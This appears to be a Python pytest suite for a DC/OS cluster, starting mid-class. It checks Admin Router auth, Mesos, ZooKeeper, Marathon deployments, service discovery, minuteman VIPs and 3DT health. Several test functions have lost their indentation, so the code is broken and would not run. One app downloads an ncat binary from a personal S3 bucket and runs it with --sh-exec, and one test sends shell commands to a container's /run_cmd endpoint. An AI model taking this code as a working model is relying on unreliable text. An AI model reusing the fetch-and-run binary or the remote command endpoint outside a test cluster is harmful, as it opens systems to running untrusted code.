        hdrs = self._suheader(disable_suauth)
        hdrs.update(kwargs.pop('headers', {}))
        return requests.delete(self.dcos_uri + path, headers=hdrs, **kwargs)

    def head(self, path="", disable_suauth=False):
        """HEAD *path* on the cluster."""
        hdrs = self._suheader(disable_suauth)
        return requests.head(self.dcos_uri + path, headers=hdrs)

    def get_base_testapp_definition(self, docker_network_bridge=True, ip_per_container=False):
        """Return (app_definition, test_uuid) for the Dockerized test server.

        The test_server app used here is only guaranteed to exist if
        the registry_cluster pytest fixture is used.  The UUID is passed to
        the container via the DCOS_TEST_UUID env var so tests can verify
        they are talking to their own instance.
        """
        test_uuid = uuid.uuid4().hex
        base_app = {
            'id': TEST_APP_NAME_FMT.format(test_uuid),
            'container': {
                'type': 'DOCKER',
                'docker': {
                    'image': '{}/test_server'.format(self.registry),
                    'forcePullImage': True,
                },
            },
            'cmd': '/opt/test_server.py 9080',
            'cpus': 0.1,
            'mem': 64,
            'instances': 1,
            'healthChecks':
            [
                {
                    'protocol': 'HTTP',
                    'path': '/ping',
                    'portIndex': 0,
                    'gracePeriodSeconds': 5,
                    'intervalSeconds': 10,
                    'timeoutSeconds': 10,
                    'maxConsecutiveFailures': 3
                }
            ],
            "env": {
                "DCOS_TEST_UUID": test_uuid
            },
        }
        if docker_network_bridge:
            # Bridge (or USER) networking: fixed container port 9080, with a
            # dynamically assigned host port.
            base_app['container']['docker']['portMappings'] = [{
                'containerPort': 9080,
                'hostPort': 0,
                'servicePort': 0,
                'protocol': 'tcp',
            }]
            if ip_per_container:
                base_app['container']['docker']['network'] = 'USER'
                base_app['ipAddress'] = {'networkName': 'dcos'}
            else:
                base_app['container']['docker']['network'] = 'BRIDGE'
            base_app['ports'] = []
        else:
            # Host networking: Marathon assigns the port via $PORT0.
            base_app['cmd'] = '/opt/test_server.py $PORT0'
            base_app['container']['docker']['network'] = 'HOST'
            base_app['ports'] = [0]
        return base_app, test_uuid

    def deploy_marathon_app(self, app_definition, timeout=300, check_health=True, ignore_failed_tasks=False):
        """Deploy an app to marathon

        This function deploys an application and then waits for marathon to
        acknowledge its successful creation or fails the test.
        The wait for application is immediately aborted if Marathon returns
        nonempty 'lastTaskFailure' field. Otherwise it waits until all the
        instances reach tasksRunning and then tasksHealthy state.

        Args:
            app_definition: a dict with application definition as specified in
                            Marathon API (https://mesosphere.github.io/marathon/docs/rest-api.html#post-v2-apps)
            timeout: a time to wait for the application to reach 'Healthy' status
                     after which the test should be failed.
            check_health: wait until Marathon reports tasks as healthy before
                          returning
            ignore_failed_tasks: do not abort on a reported lastTaskFailure

        Returns:
            A list of named tuples which represent service points of deployed
            applications. I.E:
                [Endpoint(host='172.17.10.202', port=10464), Endpoint(host='172.17.10.201', port=1630)]
        """
        r = self.post('/marathon/v2/apps', app_definition, headers=self._marathon_req_headers())
        logging.info('Response from marathon: {}'.format(repr(r.json())))
        assert r.ok

        @retrying.retry(wait_fixed=1000, stop_max_delay=timeout*1000,
                        retry_on_result=lambda ret: ret is None,
                        retry_on_exception=lambda x: False)
        def _pool_for_marathon_app(app_id):
            Endpoint = collections.namedtuple("Endpoint", ["host", "port", "ip"])
            # Some of the counters need to be explicitly enabled now and/or in
            # future versions of Marathon:
            req_params = (('embed', 'apps.lastTaskFailure'),
                          ('embed', 'apps.counts'))
            req_uri = '/marathon/v2/apps' + app_id
            r = self.get(req_uri, req_params, headers=self._marathon_req_headers())
            assert r.ok
            data = r.json()
            if not ignore_failed_tasks:
                assert 'lastTaskFailure' not in data['app'], (
                    'Application deployment failed, reason: {}'.format(data['app']['lastTaskFailure']['message'])
                )
            if (
                data['app']['tasksRunning'] == app_definition['instances'] and
                (not check_health or data['app']['tasksHealthy'] == app_definition['instances'])
            ):
                res = [Endpoint(t['host'], t['ports'][0], t['ipAddresses'][0]['ipAddress'])
                       for t in data['app']['tasks']]
                logging.info('Application deployed, running on {}'.format(res))
                return res
            else:
                logging.info('Waiting for application to be deployed %s', repr(data))
                return None
        try:
            return _pool_for_marathon_app(app_definition['id'])
        except retrying.RetryError:
            pytest.fail("Application deployment failed - operation was not "
                        "completed in {} seconds.".format(timeout))

    def destroy_marathon_app(self, app_name, timeout=300):
        """Remove a marathon app

        Abort the test if the removal was unsuccessful.

        Args:
            app_name: name of the application to remove
            timeout: seconds to wait for destruction before failing test
        """
        @retrying.retry(wait_fixed=1000, stop_max_delay=timeout*1000,
                        retry_on_result=lambda ret: not ret,
                        retry_on_exception=lambda x: False)
        def _destroy_complete(deployment_id):
            # Destruction is done once the deployment id no longer appears in
            # Marathon's active deployments.
            r = self.get('/marathon/v2/deployments', headers=self._marathon_req_headers())
            assert r.ok
            for deployment in r.json():
                if deployment_id == deployment.get('id'):
                    logging.info('Waiting for application to be destroyed')
                    return False
            logging.info('Application destroyed')
            return True
        r = self.delete('/marathon/v2/apps' + app_name, headers=self._marathon_req_headers())
        assert r.ok
        try:
            _destroy_complete(r.json()['deploymentId'])
        except retrying.RetryError:
            pytest.fail("Application destroy failed - operation was not "
                        "completed in {} seconds.".format(timeout))
def test_if_DCOS_UI_is_up(cluster):
    """The root UI page loads and every relative link on it resolves."""
    response = cluster.get('/')
    assert response.status_code == 200
    assert len(response.text) > 100
    assert 'DC/OS' in response.text
    # Not sure if it's really needed, seems a bit of an overkill:
    page = bs4.BeautifulSoup(response.text, "html.parser")
    for element in page.find_all(['link', 'a'], href=True):
        href = element.attrs['href']
        if urllib.parse.urlparse(href).netloc:
            # Relative URLs only, others are to complex to handle here
            continue
        # Some links might start with a dot (e.g. ./img/...). Remove.
        assert cluster.head(href.lstrip('.')).status_code == 200
def test_adminrouter_access_control_enforcement(auth_cluster):
    """Unauthenticated requests are rejected with 401 + login UI; the same
    endpoints succeed with superuser credentials (header or cookie)."""
    r = auth_cluster.get('/acs/api/v1', disable_suauth=True)
    assert r.status_code == 401
    assert r.headers['WWW-Authenticate'] in ('acsjwt', 'oauthjwt')
    # Make sure that this is UI's error page body,
    # including some JavaScript.
    assert '<html>' in r.text
    assert '</html>' in r.text
    assert 'window.location' in r.text
    # Verify that certain locations are forbidden to access
    # when not authed, but are reachable as superuser.
    for path in ('/mesos_dns/v1/config', '/service/marathon/', '/mesos/'):
        r = auth_cluster.get(path, disable_suauth=True)
        assert r.status_code == 401
        r = auth_cluster.get(path)
        assert r.status_code == 200
    # Test authentication with auth cookie instead of Authorization header.
    authcookie = {
        'dcos-acs-auth-cookie': auth_cluster.superuser_auth_cookie
    }
    r = auth_cluster.get(
        '/service/marathon/',
        disable_suauth=True,
        cookies=authcookie
    )
    assert r.status_code == 200
def test_logout(auth_cluster):
"""Test logout endpoint. It's a soft logout, instructing
the user agent to delete the authentication cookie, i.e. this test
does not have side effects on other tests.
"""
r = auth_cluster.get('/acs/api/v1/auth/logout')
cookieheader = r.headers['set-cookie']
assert 'dcos-acs-auth-cookie=;' in cookieheader
assert 'expires' in cookieheader.lower()
def test_if_Mesos_is_up(cluster):
r = cluster.get('/mesos')
assert r.status_code == 200
assert len(r.text) > 100
assert '<title>Mesos</title>' in r.text
def test_if_all_Mesos_slaves_have_registered(cluster):
r = cluster.get('/mesos/master/slaves')
assert r.status_code == 200
data = r.json()
slaves_ips = sorted(x['hostname'] for x in data['slaves'])
assert slaves_ips == cluster.all_slaves
# Retry if returncode is False, do not retry on exceptions.
@retrying.retry(wait_fixed=2000,
                retry_on_result=lambda r: r is False,
                retry_on_exception=lambda _: False)
def test_if_srouter_slaves_endpoint_work(cluster):
    """Admin Router's per-agent proxy serves state for every known agent.

    Returning False (instead of asserting) makes the retrying decorator
    re-run the whole test until the cached agent list catches up.
    """
    # Get currently known agents. This request is served straight from
    # Mesos (no AdminRouter-based caching is involved).
    r = cluster.get('/mesos/master/slaves')
    assert r.status_code == 200
    data = r.json()
    slaves_ids = sorted(x['id'] for x in data['slaves'])
    for slave_id in slaves_ids:
        # AdminRouter's slave endpoint internally uses cached Mesos
        # state data. That is, slave IDs of just recently joined
        # slaves can be unknown here. For those, this endpoint
        # returns a 404. Retry in this case, until this endpoint
        # is confirmed to work for all known agents.
        uri = '/slave/{}/slave%281%29/state.json'.format(slave_id)
        r = cluster.get(uri)
        if r.status_code == 404:
            return False
        assert r.status_code == 200
        data = r.json()
        assert "id" in data
        assert data["id"] == slave_id
def test_if_all_Mesos_masters_have_registered(cluster):
    # Currently it is not possible to extract this information through Mesos'es
    # API, let's query zookeeper directly.
    zk = kazoo.client.KazooClient(hosts=cluster.zk_hostports, read_only=True)
    master_ips = []
    zk.start()
    # Each registered master writes a "json.info_*" znode under /mesos
    # containing its advertised address.
    for znode in zk.get_children("/mesos"):
        if not znode.startswith("json.info_"):
            continue
        master = json.loads(zk.get("/mesos/" + znode)[0].decode('utf-8'))
        master_ips.append(master['address']['ip'])
    zk.stop()
    assert sorted(master_ips) == cluster.masters
def test_if_Exhibitor_API_is_up(cluster):
r = cluster.get('/exhibitor/exhibitor/v1/cluster/list')
assert r.status_code == 200
data = r.json()
assert data["port"] > 0
def test_if_Exhibitor_UI_is_up(cluster):
r = cluster.get('/exhibitor')
assert r.status_code == 200
assert 'Exhibitor for ZooKeeper' in r.text
def test_if_ZooKeeper_cluster_is_up(cluster):
r = cluster.get('/exhibitor/exhibitor/v1/cluster/status')
assert r.status_code == 200
data = r.json()
serving_zks = sum(1 for x in data if x['code'] == 3)
zks_ips = sorted(x['hostname'] for x in data)
zks_leaders = sum(1 for x in data if x['isLeader'])
assert zks_ips == cluster.masters
assert serving_zks == len(cluster.masters)
assert zks_leaders == 1
def test_if_all_exhibitors_are_in_sync(cluster):
    """Every Exhibitor instance reports the same cluster status as the one
    served through Admin Router."""
    reference = cluster.get('/exhibitor/exhibitor/v1/cluster/status')
    assert reference.status_code == 200
    expected = sorted(reference.json(), key=lambda node: node['hostname'])
    for master_ip in cluster.public_masters:
        direct = requests.get('http://{}:8181/exhibitor/v1/cluster/status'.format(master_ip))
        assert direct.status_code == 200
        observed = sorted(direct.json(), key=lambda node: node['hostname'])
        assert expected == observed
def test_if_uiconfig_is_available(cluster):
r = cluster.get('/dcos-metadata/ui-config.json')
assert r.status_code == 200
assert 'uiConfiguration' in r.json()
def test_if_DCOSHistoryService_is_up(cluster):
r = cluster.get('/dcos-history-service/ping')
assert r.status_code == 200
assert 'pong' == r.text
def test_if_Marathon_UI_is_up(cluster):
r = cluster.get('/marathon/ui/')
assert r.status_code == 200
assert len(r.text) > 100
assert '<title>Marathon</title>' in r.text
def test_if_srouter_service_endpoint_works(cluster):
r = cluster.get('/service/marathon/ui/')
assert r.status_code == 200
assert len(r.text) > 100
assert '<title>Marathon</title>' in r.text
def test_if_Mesos_API_is_up(cluster):
r = cluster.get('/mesos_dns/v1/version')
assert r.status_code == 200
data = r.json()
assert data["Service"] == 'Mesos-DNS'
def test_if_PkgPanda_metadata_is_available(cluster):
r = cluster.get('/pkgpanda/active.buildinfo.full.json')
assert r.status_code == 200
data = r.json()
assert 'mesos' in data
assert len(data) > 5 # (prozlach) We can try to put minimal number of pacakages required
def test_if_Marathon_app_can_be_deployed(registry_cluster):
    """Marathon app deployment integration test.

    Deploys the python test server (see test/dockers/test_server), passing a
    unique UUID to the container via an env variable, then issues
    "GET /test_uuid" against the service point Marathon reports.  The test
    succeeds when the UUID echoed back matches the one assigned here —
    proving the service point really belongs to the app just deployed.
    """
    cluster = registry_cluster
    app_definition, test_uuid = cluster.get_base_testapp_definition()
    service_points = cluster.deploy_marathon_app(app_definition)
    endpoint = service_points[0]
    r = requests.get('http://{}:{}/test_uuid'.format(endpoint.host,
                                                     endpoint.port))
    if r.status_code != 200:
        msg = "Test server replied with non-200 reply: '{0} {1}. "
        msg += "Detailed explanation of the problem: {2}"
        pytest.fail(msg.format(r.status_code, r.reason, r.text))
    assert r.json()['test_uuid'] == test_uuid
    cluster.destroy_marathon_app(app_definition['id'])
def _service_discovery_test(cluster, docker_network_bridge=True):
    """Service discovery integration test

    This test verifies if service discovery works, by comparing marathon data
    with information from mesos-dns and from containers themselves.

    This is achieved by deploying an application to marathon with two instances
    and a ["hostname", "UNIQUE"] constraint set. This should result in containers
    being deployed to two different slaves.

    The application being deployed is a simple http server written in python.
    Please check test/dockers/test_server for more details.

    Next thing is comparing the service points provided by marathon with those
    reported by mesos-dns. The tricky part here is that it may take some time for
    mesos-dns to catch up with changes in the cluster.

    And finally, one of service points is verified in as-seen-by-other-containers
    fashion.

                        +------------------------+   +------------------------+
                        |          Slave 1       |   |         Slave 2        |
                        |                        |   |                        |
                        | +--------------------+ |   | +--------------------+ |
    +--------------+    | |                    | |   | |                    | |
    |              |    | |   App instance A   +------>+   App instance B   | |
    |   TC Agent   +<---->+                    | |   | |                    | |
    |              |    | |   "test server"    +<------+    "reflector"     | |
    +--------------+    | |                    | |   | |                    | |
                        | +--------------------+ |   | +--------------------+ |
                        +------------------------+   +------------------------+

    Code running on TC agent connects to one of the containers (let's call it
    "test server") and makes a POST request with IP and PORT service point of
    the second container as parameters (let's call it "reflector"). The test
    server in turn connects to other container and makes a "GET /reflect"
    request. The reflector responds with test server's IP as seen by it and
    the session UUID as provided to it by Marathon. This data is then returned
    to TC agent in response to POST request issued earlier.

    The test succeeds if test UUIDs of the test server, reflector and the test
    itself match and the IP of the test server matches the service point of that
    container as reported by Marathon.
    """
    app_definition, test_uuid = cluster.get_base_testapp_definition(docker_network_bridge=docker_network_bridge)
    app_definition['instances'] = 2

    # Spread the two instances across distinct agents when the cluster allows it.
    if len(cluster.slaves) >= 2:
        app_definition["constraints"] = [["hostname", "UNIQUE"], ]
    service_points = cluster.deploy_marathon_app(app_definition)

    # Verify if Mesos-DNS agrees with Marathon:
    @retrying.retry(wait_fixed=1000,
                    stop_max_delay=MESOS_DNS_ENTRY_UPDATE_TIMEOUT*1000,
                    retry_on_result=lambda ret: ret is None,
                    retry_on_exception=lambda x: False)
    def _pool_for_mesos_dns():
        r = cluster.get('/mesos_dns/v1/services/_{}._tcp.marathon.mesos'.format(
            app_definition['id'].lstrip('/')))
        assert r.status_code == 200

        r_data = r.json()
        # A single all-empty entry means Mesos-DNS has not caught up yet;
        # returning None makes the retrying decorator try again.
        if r_data == [{'host': '', 'port': '', 'service': '', 'ip': ''}] or \
                len(r_data) < len(service_points):
            logging.info("Waiting for Mesos-DNS to update entries")
            return None
        else:
            logging.info("Mesos-DNS entries have been updated!")
            return r_data

    try:
        r_data = _pool_for_mesos_dns()
    except retrying.RetryError:
        msg = "Mesos DNS has failed to update entries in {} seconds."
        pytest.fail(msg.format(MESOS_DNS_ENTRY_UPDATE_TIMEOUT))

    # Marathon and Mesos-DNS must report the same (host, port) pairs.
    marathon_provided_servicepoints = sorted((x.host, x.port) for x in service_points)
    mesosdns_provided_servicepoints = sorted((x['ip'], int(x['port'])) for x in r_data)
    assert marathon_provided_servicepoints == mesosdns_provided_servicepoints

    # Verify if containers themselves confirm what Marathon says:
    payload = {"reflector_ip": service_points[1].host,
               "reflector_port": service_points[1].port}
    r = requests.post('http://{}:{}/your_ip'.format(service_points[0].host,
                                                    service_points[0].port),
                      payload)
    if r.status_code != 200:
        msg = "Test server replied with non-200 reply: '{status_code} {reason}. "
        msg += "Detailed explanation of the problem: {text}"
        pytest.fail(msg.format(status_code=r.status_code, reason=r.reason,
                               text=r.text))

    r_data = r.json()
    assert r_data['reflector_uuid'] == test_uuid
    assert r_data['test_uuid'] == test_uuid
    if len(cluster.slaves) >= 2:
        # When len(slaves)==1, we are connecting through docker-proxy using
        # docker0 interface ip. This makes this assertion useless, so we skip
        # it and rely on matching test uuid between containers only.
        assert r_data['my_ip'] == service_points[0].host

    cluster.destroy_marathon_app(app_definition['id'])
def test_if_service_discovery_works_docker_bridged_network(registry_cluster):
    """Run the service discovery scenario with docker bridge networking."""
    _service_discovery_test(registry_cluster, docker_network_bridge=True)
def test_if_service_discovery_works_docker_host_network(registry_cluster):
    """Run the service discovery scenario with docker host networking."""
    _service_discovery_test(registry_cluster, docker_network_bridge=False)
def test_if_search_is_working(registry_cluster):
    """Test if custom set search is working.

    Verifies that a marathon app running on the cluster can resolve names using
    the "search" list the cluster was launched with (if any). It also tests
    that absolute searches still work, and search + things that aren't
    subdomains fails properly.

    The application being deployed is a simple http server written in python.
    Please check test/dockers/test_server for more details.
    """
    cluster = registry_cluster
    # Launch the app
    app_definition, test_uuid = cluster.get_base_testapp_definition()
    service_points = cluster.deploy_marathon_app(app_definition)

    # Get the status
    r = requests.get('http://{}:{}/dns_search'.format(service_points[0].host,
                                                      service_points[0].port))
    if r.status_code != 200:
        msg = "Test server replied with non-200 reply: '{0} {1}. "
        msg += "Detailed explanation of the problem: {2}"
        pytest.fail(msg.format(r.status_code, r.reason, r.text))

    r_data = r.json()

    # Make sure we hit the app we expected
    assert r_data['test_uuid'] == test_uuid

    expected_error = {'error': '[Errno -2] Name or service not known'}

    # Check that result matches expectations for this cluster
    if cluster.dns_search_set:
        # With a search list configured, the short name resolves to a master.
        assert r_data['search_hit_leader'] in cluster.masters
        assert r_data['always_hit_leader'] in cluster.masters
        assert r_data['always_miss'] == expected_error
    else:  # No dns search, search hit should miss.
        assert r_data['search_hit_leader'] == expected_error
        assert r_data['always_hit_leader'] in cluster.masters
        assert r_data['always_miss'] == expected_error

    cluster.destroy_marathon_app(app_definition['id'])
def test_if_DCOSHistoryService_is_getting_data(cluster):
r = cluster.get('/dcos-history-service/history/last')
assert r.status_code == 200
# Make sure some basic fields are present from state-summary which the DC/OS
# UI relies upon. Their exact content could vary so don't test the value.
json = r.json()
assert 'cluster' in json
assert 'frameworks' in json
assert 'slaves' in json
assert 'hostname' in json
def test_if_we_have_capabilities(cluster):
"""Indirectly test that Cosmos is up since this call is handled by Cosmos.
"""
r = cluster.get(
'/capabilities',
headers={
'Accept': 'application/vnd.dcos.capabilities+json;charset=utf-8;version=v1'
}
)
assert r.status_code == 200
assert {'name': 'PACKAGE_MANAGEMENT'} in r.json()['capabilities']
def test_octarine_http(cluster, timeout=30):
    """
    Test if we are able to send traffic through octarine.
    """
    # NOTE(review): 'timeout' is accepted but never used in this body —
    # confirm whether it was meant to bound the deployment wait.
    test_uuid = uuid.uuid4().hex

    # curl resolves marathon.mesos through the local octarine client proxy;
    # if the proxy is broken the health check fails and so does the deploy.
    proxy = ('"http://127.0.0.1:$(/opt/mesosphere/bin/octarine ' +
             '--client --port marathon)"')
    check_command = 'curl --fail --proxy {} marathon.mesos'.format(proxy)

    app_definition = {
        'id': '/integration-test-app-octarine-http-{}'.format(test_uuid),
        'cpus': 0.1,
        'mem': 128,
        'ports': [0],
        'cmd': '/opt/mesosphere/bin/octarine marathon',
        'disk': 0,
        'instances': 1,
        'healthChecks': [{
            'protocol': 'COMMAND',
            'command': {
                'value': check_command
            },
            'gracePeriodSeconds': 5,
            'intervalSeconds': 10,
            'timeoutSeconds': 10,
            'maxConsecutiveFailures': 3
        }]
    }

    # deploy_marathon_app waits for the app (and its health check) to pass.
    cluster.deploy_marathon_app(app_definition)
def test_octarine_srv(cluster, timeout=30):
    """
    Test resolving SRV records through octarine.
    """
    # NOTE(review): 'timeout' is accepted but never used in this body —
    # confirm whether it was meant to bound the deployment wait.
    # Limit string length so we don't go past the max SRV record length
    test_uuid = uuid.uuid4().hex[:16]
    proxy = ('"http://127.0.0.1:$(/opt/mesosphere/bin/octarine ' +
             '--client --port marathon)"')
    port_name = 'pinger'
    # Run the octarine proxy and a simple http server inside the same task.
    cmd = ('/opt/mesosphere/bin/octarine marathon & ' +
           '/opt/mesosphere/bin/python -m http.server ${PORT0}')
    raw_app_id = 'integration-test-app-octarine-srv-{}'.format(test_uuid)
    # The health check curls the app's own SRV name through the proxy.
    check_command = ('curl --fail --proxy {} _{}._{}._tcp.marathon.mesos')
    check_command = check_command.format(proxy, port_name, raw_app_id)

    app_definition = {
        'id': '/{}'.format(raw_app_id),
        'cpus': 0.1,
        'mem': 128,
        'cmd': cmd,
        'disk': 0,
        'instances': 1,
        'portDefinitions': [
            {
                'port': 0,
                'protocol': 'tcp',
                'name': port_name,
                'labels': {}
            }
        ],
        'healthChecks': [{
            'protocol': 'COMMAND',
            'command': {
                'value': check_command
            },
            'gracePeriodSeconds': 5,
            'intervalSeconds': 10,
            'timeoutSeconds': 10,
            'maxConsecutiveFailures': 3
        }]
    }

    cluster.deploy_marathon_app(app_definition)
# By default telemetry-net sends the metrics about once a minute.
# Therefore, we wait up to a bit over 2 minutes before we give up.
def test_if_minuteman_routes_to_vip(cluster, timeout=125):
    """Test if we are able to connect to a task with a vip using minuteman.
    """
    # Launch the app and proxy
    test_uuid = uuid.uuid4().hex

    # Backend app: serves its sandbox (containing the 'imok' marker file)
    # over HTTP, registered under the VIP 1.2.3.4:5000.
    app_definition = {
        'id': "/integration-test-app-with-minuteman-vip-%s" % test_uuid,
        'cpus': 0.1,
        'mem': 128,
        'cmd': 'touch imok && /opt/mesosphere/bin/python -mhttp.server ${PORT0}',
        'portDefinitions': [
            {
                'port': 0,
                'protocol': 'tcp',
                'name': 'test',
                'labels': {
                    'VIP_0': '1.2.3.4:5000'
                }
            }
        ],
        'uris': [],
        'instances': 1,
        'healthChecks': [{
            'protocol': 'HTTP',
            'path': '/',
            'portIndex': 0,
            'gracePeriodSeconds': 5,
            'intervalSeconds': 10,
            'timeoutSeconds': 10,
            'maxConsecutiveFailures': 3
        }]
    }
    cluster.deploy_marathon_app(app_definition)

    # Proxy app: ncat forwards its own $PORT0 to the VIP, so reaching the
    # proxy from outside proves minuteman routed the VIP traffic.
    proxy_definition = {
        'id': "/integration-test-proxy-to-minuteman-vip-%s" % test_uuid,
        'cpus': 0.1,
        'mem': 128,
        'ports': [0],
        'cmd': 'chmod 755 ncat && ./ncat -v --sh-exec "./ncat 1.2.3.4 5000" -l $PORT0 --keep-open',
        'uris': ['https://s3.amazonaws.com/sargun-mesosphere/ncat'],
        'instances': 1,
        'healthChecks': [{
            'protocol': 'COMMAND',
            'command': {
                'value': 'test "$(curl -o /dev/null --max-time 5 -4 -w \'%{http_code}\' -s http://localhost:${PORT0}/|cut -f1 -d" ")" == 200'  # noqa
            },
            'gracePeriodSeconds': 0,
            'intervalSeconds': 5,
            'timeoutSeconds': 20,
            'maxConsecutiveFailures': 3,
            'ignoreHttp1xx': False
        }],
    }
    service_points = cluster.deploy_marathon_app(proxy_definition)

    # Poll the proxy until the backend's 'imok' marker shows up in the
    # directory listing, i.e. traffic flowed proxy -> VIP -> backend.
    @retrying.retry(wait_fixed=2000,
                    stop_max_delay=timeout*1000,
                    retry_on_result=lambda ret: ret is False,
                    retry_on_exception=lambda x: False)
    def _ensure_routable():
        r = requests.get('http://{}:{}'.format(service_points[0].host,
                                               service_points[0].port))
        assert(r.ok)
        data = r.text
        assert 'imok' in data

    _ensure_routable()
def test_ip_per_container(registry_cluster):
    """Test if we are able to connect to a task with ip-per-container mode
    """
    cluster = registry_cluster
    # Launch the test_server in ip-per-container mode
    # NOTE(review): test_uuid is unpacked but unused here.
    app_definition, test_uuid = cluster.get_base_testapp_definition(ip_per_container=True)

    app_definition['constraints'] = [['hostname', 'UNIQUE']]
    if len(cluster.slaves) >= 2:
        app_definition['instances'] = 2
    else:
        logging.warning('The IP Per Container tests needs 2 (private) agents to work')

    service_points = cluster.deploy_marathon_app(app_definition, check_health=False)

    # Instance 1 curls instance 0's container IP: exit status 0 proves
    # container-to-container connectivity on the overlay network.
    @retrying.retry(wait_fixed=5000, stop_max_delay=300*1000,
                    retry_on_result=lambda ret: ret is False,
                    retry_on_exception=lambda x: False)
    def _ensure_works():
        app_port = app_definition['container']['docker']['portMappings'][0]['containerPort']
        cmd = "curl -s -f http://{}:{}/ping".format(service_points[0].ip, app_port)
        r = requests.post('http://{}:{}/run_cmd'.format(service_points[1].host, service_points[1].port), data=cmd)
        logging.info('IP Per Container Curl Response: %s', repr(r.json()))
        assert(r.json()['status'] == 0)

    _ensure_works()
    cluster.destroy_marathon_app(app_definition['id'])
@pytest.mark.ccm
def test_move_external_volume_to_new_agent(cluster):
    """Test that an external volume is successfully attached to a new agent.

    If the cluster has only one agent, the volume will be detached and
    reattached to the same agent.
    """
    # Write on the first agent, then read back on the last one (which may be
    # the same agent on a single-agent cluster).
    hosts = cluster.slaves[0], cluster.slaves[-1]
    test_uuid = uuid.uuid4().hex
    test_label = 'integration-test-move-external-volume-{}'.format(test_uuid)
    mesos_volume_path = 'volume'
    docker_volume_path = '/volume'

    # Common skeleton: a single task mounting a rexray-provided external volume.
    base_app = {
        'mem': 32,
        'cpus': 0.1,
        'instances': 1,
        'container': {
            'volumes': [{
                'mode': 'RW',
                'external': {
                    'name': test_label,
                    'provider': 'dvdi',
                    'options': {'dvdi/driver': 'rexray'}
                }
            }]
        }
    }

    write_app = copy.deepcopy(base_app)
    write_app.update({
        'id': '/{}/write'.format(test_label),
        'cmd': (
            # Check that the volume is empty.
            '[ $(ls -A {volume_path}/ | grep -v --line-regexp "lost+found" | wc -l) -eq 0 ] && '
            # Write the test UUID to a file.
            'echo "{test_uuid}" >> {volume_path}/test && '
            'while true; do sleep 1000; done'
        ).format(test_uuid=test_uuid, volume_path=mesos_volume_path),
        'constraints': [['hostname', 'LIKE', hosts[0]]],
    })
    # Writer runs under the Mesos (UCR) containerizer.
    write_app['container']['type'] = 'MESOS'
    write_app['container']['volumes'][0]['containerPath'] = mesos_volume_path
    write_app['container']['volumes'][0]['external']['size'] = 1

    read_app = copy.deepcopy(base_app)
    read_app.update({
        'id': '/{}/read'.format(test_label),
        'cmd': (
            # Diff the file and the UUID.
            'echo "{test_uuid}" | diff - {volume_path}/test && '
            'while true; do sleep 1000; done'
        ).format(test_uuid=test_uuid, volume_path=docker_volume_path),
        'constraints': [['hostname', 'LIKE', hosts[1]]],
    })
    # Reader runs under the Docker containerizer, covering both engines.
    read_app['container'].update({
        'type': 'DOCKER',
        'docker': {
            'image': 'busybox',
            'network': 'HOST',
        }
    })
    read_app['container']['volumes'][0]['containerPath'] = docker_volume_path

    deploy_kwargs = {
        'check_health': False,
        # A volume might fail to attach because EC2. We can tolerate that and retry.
        'ignore_failed_tasks': True,
    }

    try:
        cluster.deploy_marathon_app(write_app, **deploy_kwargs)
        cluster.destroy_marathon_app(write_app['id'])
        cluster.deploy_marathon_app(read_app, **deploy_kwargs)
        cluster.destroy_marathon_app(read_app['id'])
    finally:
        # Always try to remove the backing EC2 volume, surfacing cleanup
        # failures with the original exception chained.
        try:
            _delete_ec2_volume(test_label)
        except Exception as ex:
            raise Exception("Failed to clean up volume {}: {}".format(test_label, ex)) from ex
def make_3dt_request(ip, endpoint, cluster, port=80):
    """Query a 3DT (diagnostics) endpoint and return its parsed JSON body.

    If the destination port is 80, all requests go through the master
    (adminrouter) and we can re-use ``cluster.get``; otherwise we query the
    3DT agents directly (e.g. port 61001, agent-adminrouter).

    Args:
        ip: node to query (unused for the adminrouter path).
        endpoint: 3DT URL path; must start with '/' when port is 80.
        cluster: cluster object providing an authenticated ``get``.
        port: 80 for adminrouter routing, anything else for direct access.

    Returns:
        The deserialized, non-empty JSON response.
    """
    if port == 80:
        assert endpoint.startswith('/'), 'endpoint {} must start with /'.format(endpoint)
        logging.info('GET {}'.format(endpoint))
        json_response = cluster.get(path=endpoint).json()
        logging.info('Response: {}'.format(json_response))
        return json_response

    url = 'http://{}:{}/{}'.format(ip, port, endpoint.lstrip('/'))
    logging.info('GET {}'.format(url))
    request = requests.get(url)
    assert request.ok
    try:
        json_response = request.json()
        logging.info('Response: {}'.format(json_response))
    except ValueError:
        # Fixed log message (was: "Coult not deserialized json response").
        logging.error('Could not deserialize json response from {}'.format(url))
        raise
    assert len(json_response) > 0, 'json response is invalid from {}'.format(url)
    return json_response
def test_3dt_health(cluster):
    """
    test health endpoint /system/health/v1
    """
    # Masters expose 3DT directly on PORT_3DT (extra-cluster request), agents
    # are reached through agent-adminrouter on PORT_3DT_AGENT. The response
    # shape is identical, so both loops share one validator (previously the
    # whole validation body was copy-pasted for masters and agents).
    for host in cluster.masters:
        response = make_3dt_request(host, BASE_ENDPOINT_3DT, cluster, port=PORT_3DT)
        _validate_3dt_health_response(response)
    for host in cluster.slaves:
        response = make_3dt_request(host, BASE_ENDPOINT_3DT, cluster, port=PORT_3DT_AGENT)
        _validate_3dt_health_response(response)


def _validate_3dt_health_response(response):
    """Validate the shape of one /system/health/v1 node response."""
    required_fields = ['units', 'hostname', 'ip', 'dcos_version', 'node_role', 'mesos_id', '3dt_version', 'system']
    required_fields_unit = ['id', 'health', 'output', 'description', 'help', 'name']
    # 'load_avarage' (sic) is the field name as emitted by the 3dt service.
    required_system_fields = ['memory', 'load_avarage', 'partitions', 'disk_usage']

    assert len(response) == len(required_fields), 'response must have the following fields: {}'.format(
        ', '.join(required_fields)
    )

    # validate units
    assert 'units' in response, 'units field not found'
    assert isinstance(response['units'], list), 'units field must be a list'
    assert len(response['units']) > 0, 'units field cannot be empty'
    for unit in response['units']:
        assert len(unit) == len(required_fields_unit), 'unit must have the following fields: {}'.format(
            ', '.join(required_fields_unit)
        )
        for required_field_unit in required_fields_unit:
            # BUG FIX: message previously read "{} must be in a unit repsonse"
            # with the placeholder never filled in.
            assert required_field_unit in unit, '{} must be in a unit response'.format(required_field_unit)
        # id, health and description cannot be empty
        assert unit['id'], 'id field cannot be empty'
        assert unit['health'] in [0, 1], 'health field must be 0 or 1'
        assert unit['description'], 'description field cannot be empty'

    # check all required fields but units
    for required_field in required_fields[1:]:
        assert required_field in response, '{} field not found'.format(required_field)
        assert response[required_field], '{} cannot be empty'.format(required_field)

    # check system metrics
    assert len(response['system']) == len(required_system_fields), 'fields required: {}'.format(
        ', '.join(required_system_fields))
    for sys_field in required_system_fields:
        assert sys_field in response['system'], 'system metric {} is missing'.format(sys_field)
